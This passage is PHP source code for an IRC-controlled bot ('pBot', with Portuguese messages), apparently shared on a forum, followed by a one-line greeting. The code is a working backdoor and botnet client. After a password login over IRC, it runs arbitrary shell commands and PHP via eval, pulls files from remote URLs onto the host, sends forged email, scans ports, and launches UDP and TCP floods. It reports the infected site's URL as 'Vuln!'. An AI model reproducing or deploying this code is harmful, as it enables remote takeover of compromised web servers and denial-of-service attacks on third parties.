".$this->config['modes']); $this->join($this->config['chan'],$this->config['key']); } if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); } if($this->buf != $old_buf) { $mcmd = array(); $msg = substr(strstr($this->buf," :"),2); $msgcmd = explode(" ",$msg); $nick = explode("!",$cmd[0]); $vhost = explode("@",$nick[1]); $vhost = $vhost[1]; $nick = substr($nick[0],1); $host = $cmd[0]; if($msgcmd[0]==$this->nick) { for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1]; } else { for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i]; } if(count($cmd)>2) { switch($cmd[1]) { case "QUIT": if($this->is_logged_in($host)) { $this->log_out($host); } break; case "PART": if($this->is_logged_in($host)) { $this->log_out($host); } break; case "PRIVMSG": if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) { if(substr($mcmd[0],0,1)==".") { switch(substr($mcmd[0],1)) { case "user": if($mcmd[1]==$this->config['password']) { $this->privmsg($this->config['chan'],"[\2Auth\2]: $nick logado!"); $this->log_in($host); } else { $this->privmsg($this->config['chan'],"[\2Auth\2]: Senha errada! $nick"); } break; } } } elseif($this->is_logged_in($host)) { if(substr($mcmd[0],0,1)==".") { switch(substr($mcmd[0],1)) { case "restart": $this->send("QUIT :restart"); fclose($this->conn); $this->start(); break; case "mail": //mail to from subject message if(count($mcmd)>4) { $header = "From: <".$mcmd[2].">"; if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) { $this->privmsg($this->config['chan'],"[\2mail\2]: Isur00tossivel mandar e-mail."); } else { $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2"); } } break; case "dns": if(isset($mcmd[1])) { $ip = explode(".",$mcmd[1]); if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) { $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." 
=> ".gethostbyaddr($mcmd[1])); } else { $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); } } break; case "info": $this->privmsg($this->config['chan'],"[\2Vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."]"); break; case "bot": $this->privmsg($this->config['chan'],"[\2Bot by matapato v1.2\2]"); break; case "cmd": if(isset($mcmd[1])) { $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $this->privmsg($this->config['chan'],"[\2cmd\2]: $command"); $pipe = popen($command,"r"); while(!feof($pipe)) { $pbuf = trim(fgets($pipe,512)); if($pbuf != NULL) $this->privmsg($this->config['chan']," : $pbuf"); } pclose($pipe); } break; case "rndnick": $this->set_nick(); break; case "sur00t": $this->send(strstr($msg,$mcmd[1])); break; case "php": $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); break; case "exec": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $exec = shell_exec($command); $ret = explode("\n",$exec); $this->privmsg($this->config['chan'],"[\2exec\2]: $command"); for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i])); break; case "pscan": // .pscan 127.0.0.1 6667 if(count($mcmd) > 2) { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); else $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); } break; case "ud.server": // .ud.server <server> <port> [password] if(count($mcmd)>2) { $this->config['server'] = $mcmd[1]; $this->config['port'] = $mcmd[2]; if(isset($mcmcd[3])) { $this->config['pass'] = $mcmd[3]; $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." 
Senha: ".$mcmd[3]); } else { $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]); } } break; case "download": if(count($mcmd) > 2) { if(!$fp = fopen($mcmd[2],"w")) { $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada."); } else { if(!$get = file($mcmd[1])) { $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2"); } else { for($i=0;$i<=count($get);$i++) { fwrite($fp,$get[$i]); } $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2"); } fclose($fp); } } break; case "die": $this->send("QUIT :MORRI! comando por $nick"); fclose($this->conn); exit; case "logout": $this->log_out($host); $this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!"); break; case "udpflood": if(count($mcmd)>3) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]); } break; case "tcpflood": if(count($mcmd)>5) { $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); } break; } } } break; } } } $old_buf = $this->buf; } $this->start(); } function send($msg) { fwrite($this->conn,"$msg\r\n"); } function join($chan,$key=NULL) { $this->send("JOIN $chan $key"); } function privmsg($to,$msg) { $this->send("PRIVMSG $to :$msg"); } function is_logged_in($host) { if(isset($this->users[$host])) return 1; else return 0; } function log_in($host) { $this->users[$host] = true; } function log_out($host) { unset($this->users[$host]); } function set_nick() { if(isset($_SERVER['SERVER_SOFTWARE'])) { if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick = ""; } $this->nick .= $this->config['prefix']; for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9); $this->send("NICK ".$this->nick); } function udpflood($host,$packetsize,$time) { $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]"); $packet = ""; for($i=0;$i<$packetsize;$i++) { $packet .= 
chr(mt_rand(1,256)); } $timei = time(); $i = 0; while(time()-$timei < $time) { $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); fwrite($fp,$packet); fclose($fp); $i++; } $env = $i * $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel); $env = round($env); $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s "); } function tcpflood($host,$packets,$packetsize,$port,$delay) { $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]"); $packet = ""; for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) { $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>"); return 0; } else { fwrite($fp,$packet); fclose($fp); } sleep($delay); } $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port."); } } $bot = new pBot; $bot->start(); ?>
  25. Yes, how are you sunjester. Didn't hear from you for a wile. -Gonzalez